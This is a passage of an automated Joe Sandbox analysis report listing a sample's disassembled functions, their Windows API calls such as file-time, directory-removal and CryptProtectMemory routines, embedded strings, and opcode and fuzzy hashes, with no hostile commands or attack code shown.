                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: File$Create$CloseHandleTime
                                                            • String ID:
                                                            • API String ID: 2287278272-0
                                                            • Opcode ID: 78852771bbf2d4fd3616843079dcf22e66cb70e7c3c40328e1cfa8fefe4e9768
                                                            • Instruction ID: e39f5e467d297a03b8a2d13c4af27078550ed548602b350a84acdfb466155f78
                                                            • Opcode Fuzzy Hash: 78852771bbf2d4fd3616843079dcf22e66cb70e7c3c40328e1cfa8fefe4e9768
                                                            • Instruction Fuzzy Hash: EA41CFB014C381AAE721DE24DC55BEBBBE8AF85300F04092DF5D593191DB68EA48DB56
                                                            Function 000410E0 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID:
                                                            • API String ID: 176396367-0
                                                            • Opcode ID: 7ab28f9fdb0f06bf4d67d720e698496aac60826953ea3181dc78371df10bc846
                                                            • Instruction ID: a3aff44d6d68d52e0836cad459e8046a7c29b5ae47e9de11df5c67885fef1aaf
                                                            • Opcode Fuzzy Hash: 7ab28f9fdb0f06bf4d67d720e698496aac60826953ea3181dc78371df10bc846
                                                            • Instruction Fuzzy Hash: B341E571E00A299BDB619F688D099EF7BB8EF05312F000029FD05F7246DB34AD488BE5
                                                            Function 000484FF Relevance: 6.1, APIs: 4, Instructions: 118COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00048512
                                                            • _wcslen.LIBCMT ref: 00048538
                                                            • _wcslen.LIBCMT ref: 000485CF
                                                            • _wcslen.LIBCMT ref: 00048637
                                                              • Part of subcall function 0004B946: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004B971
                                                              • Part of subcall function 0004B3FF: RemoveDirectoryW.KERNEL32(?,?,?,00048629,?), ref: 0004B410
                                                              • Part of subcall function 0004B3FF: RemoveDirectoryW.KERNEL32(?,?,?,00000800,?,00048629,?), ref: 0004B43E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen$DirectoryRemove$CloseFind
                                                            • String ID:
                                                            • API String ID: 973666142-0
                                                            • Opcode ID: f0ed990832f0db059030ebe384a0343020ec48658f97ee16a0a6c6f05874ee98
                                                            • Instruction ID: 55d506142e42bd7d576fba7de1926eb16f9de9e9febfb01e0c6aba1709c5c627
                                                            • Opcode Fuzzy Hash: f0ed990832f0db059030ebe384a0343020ec48658f97ee16a0a6c6f05874ee98
                                                            • Instruction Fuzzy Hash: 5431C8F1800218A6CF61AF64CC45BEE33A5AF04381F058CB6FD4997146EF70DE848B98
                                                            Function 0006D998 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(?,00000000,62E85006,00065924,00000000,00000000,00066959,?,00066959,?,00000001,00065924,62E85006,00000001,00066959,00066959), ref: 0006D9E5
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0006DA6E
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0006DA80
                                                            • __freea.LIBCMT ref: 0006DA89
                                                              • Part of subcall function 0006A64E: RtlAllocateHeap.NTDLL(00000000,?,?,?,000653E4,?,0000015D,?,?,?,?,000668C0,000000FF,00000000,?,?), ref: 0006A680
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: bb9023f86fec1e49e819d560ee437151c647d0f4673e9774f2df418347464c78
                                                            • Instruction ID: 77c8266e96c30c8094865e8732bdcde61a07e26ce9307b699653efe1e6c3c2e1
                                                            • Opcode Fuzzy Hash: bb9023f86fec1e49e819d560ee437151c647d0f4673e9774f2df418347464c78
                                                            • Instruction Fuzzy Hash: 4331AD72E0420AABDF24DFA4DC45EEE7BA6EB40310B054229FC04E6151EB39CD90DBA1
                                                            Function 0005B643 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDC.USER32(00000000), ref: 0005B646
                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0005B655
                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0005B663
                                                            • ReleaseDC.USER32(00000000,00000000), ref: 0005B671
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: CapsDevice$Release
                                                            • String ID:
                                                            • API String ID: 1035833867-0
                                                            • Opcode ID: 39d63d6cbb830535db6a452323908e78669751ca32d6215822efd7fcefae0424
                                                            • Instruction ID: a4f246504bb2534f4a25b35d0707c05be67efaf74101c48547b24170fd2b8a1b
                                                            • Opcode Fuzzy Hash: 39d63d6cbb830535db6a452323908e78669751ca32d6215822efd7fcefae0424
                                                            • Instruction Fuzzy Hash: 6FE0EC31A41E61A7F6601B606C0DF8B3B64BB07713F014001FB059A190DAAC44088BE1
                                                            Function 0005B7EC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0005B679: GetDC.USER32(00000000), ref: 0005B67D
                                                              • Part of subcall function 0005B679: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0005B688
                                                              • Part of subcall function 0005B679: ReleaseDC.USER32(00000000,00000000), ref: 0005B693
                                                            • GetObjectW.GDI32(?,00000018,?), ref: 0005B81C
                                                              • Part of subcall function 0005BAAE: GetDC.USER32(00000000), ref: 0005BAB7
                                                              • Part of subcall function 0005BAAE: GetObjectW.GDI32(?,00000018,?), ref: 0005BAE6
                                                              • Part of subcall function 0005BAAE: ReleaseDC.USER32(00000000,?), ref: 0005BB7E
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ObjectRelease$CapsDevice
                                                            • String ID: (
                                                            • API String ID: 1061551593-3887548279
                                                            • Opcode ID: 32e8f77cba2d631015f726a244b25dab51e512cd22e6c579141f0536736586cf
                                                            • Instruction ID: 829af8a5e188e1ab4677b82465c24742f06de7dcd7a937673fded292aabb7ea9
                                                            • Opcode Fuzzy Hash: 32e8f77cba2d631015f726a244b25dab51e512cd22e6c579141f0536736586cf
                                                            • Instruction Fuzzy Hash: B791F271604744AFE621DF25C844E2BBBE8FFC9701F00491EF99AD7261DB35A846CB62
                                                            Function 0006C1C8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0006C334
                                                              • Part of subcall function 00065036: IsProcessorFeaturePresent.KERNEL32(00000017,00065008,00000000,00069FB4,00000000,00000000,00000000,00000016,?,?,00065015,00000000,00000000,00000000,00000000,00000000), ref: 00065038
                                                              • Part of subcall function 00065036: GetCurrentProcess.KERNEL32(C0000417,00069FB4,00000000,?,00000003,0006A3E8), ref: 0006505A
                                                              • Part of subcall function 00065036: TerminateProcess.KERNEL32(00000000,?,00000003,0006A3E8), ref: 00065061
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                            • String ID: *?$.
                                                            • API String ID: 2667617558-3972193922
                                                            • Opcode ID: d880ea29d1525385f5bc4d26a230f40480b8b7b7c38aab8f8975374564cc868a
                                                            • Instruction ID: 33d15564fc76b0d7ecf11294ca6538d44a59cabf8730ba0a27e70a436d72ccc4
                                                            • Opcode Fuzzy Hash: d880ea29d1525385f5bc4d26a230f40480b8b7b7c38aab8f8975374564cc868a
                                                            • Instruction Fuzzy Hash: BE516175E0021A9FEF14DFA8C881ABDB7F6FF58314F24816AE895E7341E6359E018B50
                                                            Function 0004809E Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 000480A3
                                                              • Part of subcall function 000518E0: _wcslen.LIBCMT ref: 000518E6
                                                              • Part of subcall function 0004B946: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0004B971
                                                            • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00048242
                                                              • Part of subcall function 0004B8C6: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B8DA
                                                              • Part of subcall function 0004B8C6: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0004B595,?,?,?,0004B3E5,?,00000001,00000000,?,?), ref: 0004B90B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                            • String ID: :
                                                            • API String ID: 3226429890-336475711
                                                            • Opcode ID: 4124a3ed5096527422f56c002fe4b5a042f3b13b7cbd1bb0c86d711bedf05754
                                                            • Instruction ID: def0b18e79ab7b55019482c2567f995a2ed347a2722b5906c074a5611d71beda
                                                            • Opcode Fuzzy Hash: 4124a3ed5096527422f56c002fe4b5a042f3b13b7cbd1bb0c86d711bedf05754
                                                            • Instruction Fuzzy Hash: D25184B1900258AAEB25EB50CD59EEF737DAF45300F0084B5B609A6093DF745F89CF65
                                                            Function 0005C51E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _wcslen
                                                            • String ID: }
                                                            • API String ID: 176396367-4239843852
                                                            • Opcode ID: 46c22a83f6ce21bc8437e1c5761ee0c4099f8dd22d059f2be622ad647ffe15b9
                                                            • Instruction ID: 996a7e2aa2e9eb691aa1196638ec487f75d6f731f14e15542f5176abcd332583
                                                            • Opcode Fuzzy Hash: 46c22a83f6ce21bc8437e1c5761ee0c4099f8dd22d059f2be622ad647ffe15b9
                                                            • Instruction Fuzzy Hash: 9421C272504B065EE731EAA4C845EAB73ECDF80756F40042AFA44C7142FB64EE8C82A2
                                                            Function 00050675 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00050600: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0005061F
                                                              • Part of subcall function 00050600: GetProcAddress.KERNEL32(0008A1F0,CryptUnprotectMemory), ref: 0005062F
                                                            • GetCurrentProcessId.KERNEL32(?,00000200,?,00050670), ref: 00050703
                                                            Strings
                                                            • CryptProtectMemory failed, xrefs: 000506BA
                                                            • CryptUnprotectMemory failed, xrefs: 000506FB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: AddressProc$CurrentProcess
                                                            • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                                            • API String ID: 2190909847-396321323
                                                            • Opcode ID: 9412165fdccfc3928bdac08b45011e50a23cda42eeae194820678ab6b9bb4551
                                                            • Instruction ID: 87cda05097c13906f38637fbc5cdba7aebe9028823d5073367b56d4546309bf5
                                                            • Opcode Fuzzy Hash: 9412165fdccfc3928bdac08b45011e50a23cda42eeae194820678ab6b9bb4551
                                                            • Instruction Fuzzy Hash: B3117832E04229AFEF125F20DC4596F3B94FF44B61B018116FC446B292DB38AD968FC9
                                                            Function 0004CDA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0004CDC7
                                                              • Part of subcall function 00044A00: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A13
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: __vswprintf_c_l_swprintf
                                                            • String ID: %c:\
                                                            • API String ID: 1543624204-3142399695
                                                            • Opcode ID: 1ca83db36e1ba5b0defa48f6a079768a012d99cd306b95e831d9b8ef85dcc55e
                                                            • Instruction ID: 0b7ff677c6504b92267b978e900bbc17a87e21ec71112946c7f9ff7ae51723da
                                                            • Opcode Fuzzy Hash: 1ca83db36e1ba5b0defa48f6a079768a012d99cd306b95e831d9b8ef85dcc55e
                                                            • Instruction Fuzzy Hash: BA01DDA390532179E670A77ADC46DABA7ECDF96770750442EF445C6053EB30D450C2F5
                                                            Function 00060BCC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00060C0D
                                                            • ___raise_securityfailure.LIBCMT ref: 00060CF5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor___raise_securityfailure
                                                            • String ID: x=
                                                            • API String ID: 3761405300-798900570
                                                            • Opcode ID: 028d63c59ee4c0ce756c95e1b2a947c88ecfd2d929b39b55d9b83c2bdee351e3
                                                            • Instruction ID: d6e506cc8f5c869dcd13ae8ddd7d936309e07b0807e163540afc972beef53eb9
                                                            • Opcode Fuzzy Hash: 028d63c59ee4c0ce756c95e1b2a947c88ecfd2d929b39b55d9b83c2bdee351e3
                                                            • Instruction Fuzzy Hash: 5521D3B5940A00EEF740CF29F986644BBE5FB5A714F10902AF5099B3E1E3B99A84CF04
                                                            Function 000412F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0004F5E8: _swprintf.LIBCMT ref: 0004F60E
                                                              • Part of subcall function 0004F5E8: _strlen.LIBCMT ref: 0004F62F
                                                              • Part of subcall function 0004F5E8: SetDlgItemTextW.USER32(?,00080274,?), ref: 0004F68F
                                                              • Part of subcall function 0004F5E8: GetWindowRect.USER32(?,?), ref: 0004F6C9
                                                              • Part of subcall function 0004F5E8: GetClientRect.USER32(?,?), ref: 0004F6D5
                                                            • GetDlgItem.USER32(00000000,00003021), ref: 0004133A
                                                            • SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                                            • String ID: 0
                                                            • API String ID: 2622349952-4108050209
                                                            • Opcode ID: f90c7abac2ae2b5ac2803298ac7db1c851428f89626d6cf6ba35d71ae2ced96e
                                                            • Instruction ID: e7eaec00a92f117cae49444f4eee2cfed385a3efcab3dd3b287ed4eccdcf577f
                                                            • Opcode Fuzzy Hash: f90c7abac2ae2b5ac2803298ac7db1c851428f89626d6cf6ba35d71ae2ced96e
                                                            • Instruction Fuzzy Hash: ADF08CB0140A88BADF651F208C0DBF93B98BB21786F048034FD84545A2DB79CA94EB18
                                                            Function 0006947A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0006CF40: GetEnvironmentStringsW.KERNEL32 ref: 0006CF49
                                                              • Part of subcall function 0006CF40: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006CF6C
                                                              • Part of subcall function 0006CF40: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006CF92
                                                              • Part of subcall function 0006CF40: _free.LIBCMT ref: 0006CFA5
                                                              • Part of subcall function 0006CF40: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006CFB4
                                                            • _free.LIBCMT ref: 000694C0
                                                            • _free.LIBCMT ref: 000694C7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                            • String ID: hB
                                                            • API String ID: 400815659-2602534675
                                                            • Opcode ID: 5ecf549f37bf2f83e269e5d8fb48ff019d1f311b143b6088cf2921fd81aa65fb
                                                            • Instruction ID: d9d47cdc7785e37877eb72f98dcf6a17d650fbcb15e3d71811fdeb7e101606f0
                                                            • Opcode Fuzzy Hash: 5ecf549f37bf2f83e269e5d8fb48ff019d1f311b143b6088cf2921fd81aa65fb
                                                            • Instruction Fuzzy Hash: E3E06526A0A91145AA75327E6C06EAF164B5FC2731B624366F824965C7DEA8C80301A6
                                                            Function 000522DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19synchronizationCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,000523F9,?,?,0005246F,?,?,?,?,?,00052459), ref: 000522E2
                                                            • GetLastError.KERNEL32(?,?,0005246F,?,?,?,?,?,00052459), ref: 000522EE
                                                              • Part of subcall function 000476C9: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000476E7
                                                            Strings
                                                            • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 000522F7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1467206261.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
                                                            • Associated: 00000000.00000002.1467184017.0000000000040000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467241883.0000000000074000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000080000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467262896.00000000000A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1467318889.00000000000A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_40000_4wx72yFLka.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                            • String ID: WaitForMultipleObjects error %d, GetLastError %d
                                                            • API String ID: 1091760877-2248577382
